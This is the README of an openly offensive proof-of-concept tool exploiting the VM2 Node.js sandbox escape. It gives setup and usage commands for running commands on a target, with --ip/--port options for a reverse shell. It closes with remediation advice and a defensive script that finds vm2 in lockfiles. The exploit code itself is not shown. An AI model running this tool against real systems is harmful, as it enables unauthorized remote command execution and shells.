VM2 Exploit

PoC Exploit for VM2 Sandbox Escape Vulnerability - All Versions

Demo video: VM2-Exploit.mp4

Description

The VM2 project has been discontinued. It released 65 versions, and every one of them is vulnerable to command execution via sandbox escape.

Additional Notes

  • Note: This tool was written for quick and easy use, so its usage may look different.
  • Provide either a URL or paste the cURL request copied from your browser (Firefox is recommended).
  • This uses the sandbox escape in [email protected] via the Promise[@@species] method.
  • If you do not provide --ip and --port, the exploit offers a terminal-like interface for running commands on the target (it is not a real interactive shell).
  • If the target's version is < 3.6.17, consider using this.
  • Feel free to contribute!

Usage

Setting Up

git clone https://github.com/rvizx/VM2-Exploit
cd VM2-Exploit
python3 exploit.py

or

wget https://raw.githubusercontent.com/rvizx/VM2-Exploit/main/exploit.py
python3 exploit.py

Usage

python3 exploit.py <curl-command | target-url> [--additional-args]

Additional Args:

--param    = parameter that contains the command (the first one is selected by default if not provided)
--ip       = your local IP for a reverse shell (--ip=12.24.34.3)
--port     = your local port for a reverse shell (--port=7777)
--base64   = set if the payload is base64-encoded
--hex      = set if the payload is hex-encoded

How to fix?

  • Consider migrating your code to isolated-vm.
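Before migrating, it helps to know where vm2 is still pulled in, including as a transitive dependency. The following is an added example (not code from this project) that walks a package-lock.json and flags every vm2 entry; since all published versions are affected, any hit is a finding. The two sample lockfiles are constructed.

```javascript
// Added example, not part of the VM2-Exploit project: locate vm2 in a package-lock.json
// dependency tree. Because every published vm2 release is affected and the project is
// discontinued, any occurrence is a finding regardless of version.
// Handles lockfileVersion 1 (nested "dependencies") and 2/3 (flat "packages" map).

function findVm2(lock) {
  const hits = [];
  if (lock.packages) {
    // v2/v3: keys are install paths such as "node_modules/foo/node_modules/vm2"
    for (const [path, meta] of Object.entries(lock.packages)) {
      if (path === "node_modules/vm2" || path.endsWith("/node_modules/vm2")) {
        hits.push({ path, version: meta.version });
      }
    }
    return hits; // v2 also carries "dependencies"; skip it to avoid double counting
  }
  // v1: recursive "dependencies" objects, one level per nested node_modules
  const walk = (deps, prefix) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      const path = `${prefix}node_modules/${name}`;
      if (name === "vm2") hits.push({ path, version: meta.version });
      walk(meta.dependencies, `${path}/`);
    }
  };
  walk(lock.dependencies, "");
  return hits;
}

// Constructed sample lockfiles (not real projects; version numbers are made up).
const SAMPLE_LOCK_V3 = { lockfileVersion: 3, packages: {
  "": { name: "app", version: "1.0.0" },
  "node_modules/express": { version: "4.18.2" },
  "node_modules/some-plugin": { version: "1.0.0", dependencies: { vm2: "^3.9.0" } },
  "node_modules/some-plugin/node_modules/vm2": { version: "3.9.19" },
} };
const SAMPLE_LOCK_V1 = { lockfileVersion: 1, dependencies: {
  express: { version: "4.18.2" },
  "some-plugin": { version: "1.0.0", dependencies: { vm2: { version: "3.9.17" } } },
} };

// Report in a form suitable for a CI gate: returns 1 when vm2 is present, 0 otherwise.
function report(lock) {
  const hits = findVm2(lock);
  for (const h of hits) console.log(`vm2 ${h.version} found at ${h.path} (migrate to isolated-vm)`);
  return hits.length === 0 ? 0 : 1;
}

report(SAMPLE_LOCK_V3); // prints one finding, returns 1
report(SAMPLE_LOCK_V1); // prints one finding, returns 1
```

To run it against a real lockfile, parse the file with JSON.parse and pass the object to report(); a non-zero return can fail the build.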

Credits

Xion (SeungHyun Lee) of KAIST Hacking Lab for disclosing these vulnerabilities and providing detailed analysis.